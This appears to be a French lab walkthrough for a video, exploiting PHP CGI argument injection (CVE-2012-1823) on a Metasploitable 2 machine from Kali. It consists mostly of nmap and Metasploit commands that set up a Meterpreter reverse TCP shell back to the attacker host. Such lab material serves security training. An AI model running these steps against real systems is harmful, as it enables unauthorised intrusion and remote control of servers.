
Dans cette vidéo, l'exploitation de l'injection d'arguments PHP CGI (CVE-2012-1823) sur le serveur Metasploitable 2 via Kali Linux est réalisée à l'aide de Metasploit.
Trouvez l'IP de Metasploitable depuis Kali :
ip a
Par exemple :
Kali : 192.168.56.101
Metasploitable2 : 192.168.56.102
Vérifions le port et le service :
nmap -p 80 192.168.56.102
On peut aussi vérifier dans le navigateur :
msfconsole
search php cgi
Le bon module :
use exploit/multi/http/php_cgi_arg_injection
set RHOSTS 192.168.56.102
set RPORT 80
set TARGETURI /
Nous choisissons la payload :
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 4444
Vérifions :
show options
run
ou
exploit
En cas de succès :
Meterpreter session 1 opened
sysinfo
whoami